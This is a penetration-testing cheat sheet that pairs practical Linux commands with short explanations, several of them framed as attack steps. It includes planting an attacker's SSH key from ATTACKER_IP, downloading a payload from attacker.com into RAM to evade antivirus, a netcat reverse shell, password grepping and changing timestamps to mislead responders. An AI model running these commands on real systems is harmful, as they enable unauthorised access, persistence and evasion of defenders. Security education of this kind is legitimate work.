Practical Linux Commands
Become VeryLazyTech member! 🎁
Follow us on:
✖ Twitter @VeryLazyTech.
👾 Github @VeryLazyTech.
📜 Medium @VeryLazyTech.
📺 YouTube @VeryLazyTech.
📩 Telegram @VeryLazyTech.
🕵️♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚
In penetration testing, Linux commands can be incredibly powerful when used efficiently. The following guide provides practical Linux commands for pentesters, explaining what each command does and how it can help during an engagement. These commands cover file manipulation, networking, process monitoring, and more.
File Manipulation Commands
Base64 Encoding for Exfiltration
base64 -w 0 file
Encodes a file to Base64 without line breaks. Useful for encoding data in a way that can be sent via HTTP or other text-based protocols.
Hex Dump Without New Lines
xxd -p boot12.bin | tr -d '\n'
Converts a binary file into a plain hex format. Removing new lines makes the output easier to manipulate, which is helpful for crafting payloads.
Public Key Injection
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
Adds an attacker's public key to the target machine’s authorized SSH keys. This gives the attacker remote access via SSH.
Count Lines in a File
wc -l <file>
Counts the number of lines in a file, useful for verifying the amount of output or checking logs.
Sort and Remove Duplicates
sort file | uniq
Sorts a file and removes duplicate lines. This is helpful when processing log files and identifying unique entries.
Find Files Modified Within a Date Range
find / -newermt 2023-08-01 ! -newermt 2023-08-05 -type f
Finds files modified between specific dates, aiding in identifying files that may have been tampered with during an attack.
Networking and Communication Commands
Set Up an HTTP Server (Quick File Serving)
python3 -m http.server 80
Creates an HTTP server to share files with the target machine. This is useful for serving payloads or retrieving data.
Curl for Sending JSON Data
curl --header "Content-Type: application/json" --request POST --data '{"username":"admin","password":"password"}' http://target/endpoint
Sends JSON data to a web application, ideal for testing API endpoints or mimicking application behavior.
SSH Key Scanning
ssh-keyscan 10.10.10.101
Retrieves the SSH key fingerprint from a remote machine. It helps in identifying duplicate SSH hosts, reducing security blind spots.
System Monitoring & Process Management
List Open Files of Network Processes
lsof -i
Lists open files related to network processes. This is particularly useful to identify suspicious connections or find the process behind an open port.
Process Monitoring with
ps
ps aux | grep apache
Shows all processes and filters them by name (in this case,
apache
). This command helps you discover running services on the system.Finding Network Connections
netstat -an | grep ESTABLISHED
Displays established network connections. Essential for spotting backdoors or open connections to attacker-controlled servers.
Encryption and Key Management
Generate RSA Key
openssl genrsa -out attacker.key 2048
Creates an RSA key, which can be used for encrypted communication, establishing secure connections, or signing data.
Decrypt SSH Key
openssl rsa -in key.ssh.enc -out key.ssh
Decrypts an encrypted SSH private key. Useful when handling compromised SSH keys that are password protected.
Create a Signed Certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Creates a self-signed certificate, which can be used to mimic HTTPS servers for man-in-the-middle (MITM) attacks or phishing.
Privilege Escalation Tools
Set Immutable Bit on a File
sudo chattr +i /path/to/file
Prevents modification or deletion of a file. Setting this flag can be a persistence technique to maintain unauthorized changes.
Find SUID Binaries
find / -perm -4000 2>/dev/null
Finds all files with the SUID bit set. SUID binaries are a common target for privilege escalation attacks, making this a valuable command during enumeration.
Exploitation Utilities
Download to RAM to Evade Detection
wget http://attacker.com/payload.py -O /dev/shm/payload.py
Downloads a file directly into the system’s RAM, making it less detectable by antivirus and other security software.
Running a Reverse Shell with Netcat
nc -e /bin/bash 10.10.10.10 4444
Establishes a reverse shell from the target to the attacker's machine. This command is a cornerstone for remote code execution exploits.
Advanced Grep for Data Extraction
Extract Emails
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt
Extracts email addresses from files. Useful when searching for credentials or contacts during an attack.
Extract Passwords
grep -i "pwd\|pass\|password" file.txt
Looks for potential password patterns in a file, an essential command for data discovery during internal network penetration tests.
Extract IP Addresses
grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" file.txt
Finds all IP addresses inside a file, helpful for network mapping and identifying potential targets.
Miscellaneous Commands
Change Timezone
sudo dpkg-reconfigure tzdata
Allows the attacker to change the system’s timezone. Useful for modifying timestamps during an attack to mislead incident responders.
Mount Virtual Hard Drives
guestmount --add NAME.vhd --inspector --ro /mnt/vhd
Mounts a VHD file for investigation or exploitation. This can help access virtual machines' data without fully booting them.
Last updated
Was this helpful?